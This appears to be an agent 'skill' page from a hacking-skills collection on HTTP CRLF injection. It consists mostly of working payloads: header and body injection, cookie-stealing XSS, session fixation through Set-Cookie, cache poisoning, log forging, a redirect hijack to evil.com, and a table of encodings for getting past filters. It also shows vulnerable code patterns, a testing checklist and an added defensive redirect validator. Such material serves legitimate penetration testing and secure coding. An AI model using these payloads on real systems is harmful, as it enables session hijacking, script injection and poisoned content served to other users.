crlf-injection

INSTALLATION
npx skills add https://github.com/yaklang/hack-skills --skill crlf-injection
Run in your project or agent environment. Adjust flags if your CLI version differs.

SKILL.md

2. DETECTION

Basic Probe

%0D%0ANew-Header:injected

# In URL parameter:

https://target.com/redirect?url=%0D%0AX-Injected:true

# Check response headers for "X-Injected: true"

Double CRLF — Body Injection

Two consecutive CRLF sequences end headers and start body:

%0D%0A%0D%0A<script>alert(1)</script>

# Result:

HTTP/1.1 302 Found
Location: /page

<script>alert(1)</script>

3. EXPLOITATION SCENARIOS

Session Fixation via Set-Cookie

%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id

XSS via Response Body

%0D%0A%0D%0A<html><script>alert(document.cookie)</script></html>

Cache Poisoning

If the response is cached by a CDN or proxy, injected headers/body are served to all users:

GET /page?q=%0D%0AContent-Length:0%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:text/html%0D%0A%0D%0A<script>alert(1)</script>

Log Injection

CRLF in log-visible fields (User-Agent, Referer) can forge log entries:

User-Agent: normal%0D%0A127.0.0.1 - admin [date] "GET /admin" 200

4. FILTER BYPASS

| Filter | Bypass |
|---|---|
| Blocks %0D%0A | Try %0D alone, %0A alone, or %E5%98%8A%E5%98%8D (Unicode) |
| URL decodes once | Double-encode: %250D%250A |
| Strips \r\n literally | Use URL-encoded form |
| Blocks in value only | Inject in parameter name |

# Unicode/UTF-8 bypass:

%E5%98%8A%E5%98%8D  → decoded as CRLF in some parsers

# Double URL encoding:

%250D%250A → server decodes to %0D%0A → interpreted as CRLF

# Partial injection (LF only):

%0A → some servers accept LF without CR

5. REAL-WORLD EXPLOITATION CHAINS

CRLF + Session Fixation

# Inject Set-Cookie via CRLF in redirect parameter:

?url=%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id

# Result:

HTTP/1.1 302 Found
Location: /page
Set-Cookie: PHPSESSID=attacker_controlled_session_id

# Victim uses attacker's session → attacker hijacks after login

CRLF → XSS via Double CRLF Body Injection

# Two CRLF sequences end headers and inject response body:

?url=%0D%0A%0D%0A<script>alert(document.cookie)</script>

# Result:

HTTP/1.1 302 Found
Location: /page

<script>alert(document.cookie)</script>

CRLF in 302 Location → Redirect Hijack

# Inject new Location header before the original:

?url=%0D%0ALocation:http://evil.com%0D%0A%0D%0A

# Some servers use the LAST Location header → redirect to evil.com

6. COMMON VULNERABLE PATTERNS

// PHP — header() with user input (PHP < 5.1.2 vulnerable):

header("Location: " . $_GET['url']);

# Python — redirect with unsanitized input:

return redirect(request.args.get('next'))

// Node.js — setHeader with user input:

res.setHeader('X-Custom', userInput);

// Java — response.setHeader with user input:

response.setHeader("Location", request.getParameter("url"));
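A hardened counterpart to these patterns, added here as an example and not code from the yaklang/hack-skills skill: it normalises the redirect parameter the way the filter-bypass section says naive filters fail to (repeated URL decoding, LF-only input, low-byte Unicode truncation) before deciding whether the value may reach a Location header. Function names and the sample values are constructed for this example; it uses only the Python standard library in place of the Flask handler shown above.

```python
import re
import urllib.parse

# Constructed sample ?url= / ?next= values (not from the original page): a
# benign path plus raw, double-encoded, LF-only and Unicode-truncation forms.
SAMPLE_TARGETS = [
    "/account",
    "/page%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id",
    "/page%250D%250AX-Injected:true",
    "/page%0AX-Injected:true",
    "/page%E5%98%8A%E5%98%8DX-Injected:true",
]

_CRLF = re.compile(r"[\r\n]")


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """URL-decode until the value stops changing, so a double-encoded
    %250D%250A is inspected as the CR LF it becomes after two decodes."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def contains_crlf(value: str) -> bool:
    """True for a bare CR/LF after decoding, or for a code point whose low
    byte is 0x0A/0x0D (U+560A/U+560D from %E5%98%8A%E5%98%8D), which some
    parsers truncate to CR/LF. Conservative by design for a redirect path."""
    decoded = fully_decode(value)
    if _CRLF.search(decoded):
        return True
    return any(ord(ch) & 0xFF in (0x0A, 0x0D) for ch in decoded)


def safe_redirect_target(value):
    """Hardened counterpart of redirect(request.args.get('next')): refuse
    anything that could split the Location header and allow only same-site
    relative paths. Returns None when the value must not reach the header."""
    if not value or contains_crlf(value):
        return None
    # "//host" and "/\host" are scheme-relative and would redirect off-site.
    if not value.startswith("/") or value[:2] in ("//", "/\\"):
        return None
    return value


def flagged_targets(values=SAMPLE_TARGETS):
    """Return the sample values the hardened handler refuses."""
    return [v for v in values if safe_redirect_target(v) is None]
```

The same `contains_crlf` check belongs on any header value built from request data (the `setHeader` cases above), not only on redirect targets.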

7. TESTING CHECKLIST

□ Inject %0D%0A in redirect URL parameters

□ Inject %0D%0A in Set-Cookie name/value paths

□ Try double CRLF for body injection → XSS

□ Test encoding bypasses: double-encode, Unicode (%E5%98%8D%E5%98%8A), LF-only (%0A)

□ Check if response is cacheable → cache poisoning

□ Test in User-Agent / Referer for log injection

□ Test CRLF + Set-Cookie for session fixation

□ Verify if Location header can be injected in 302 responses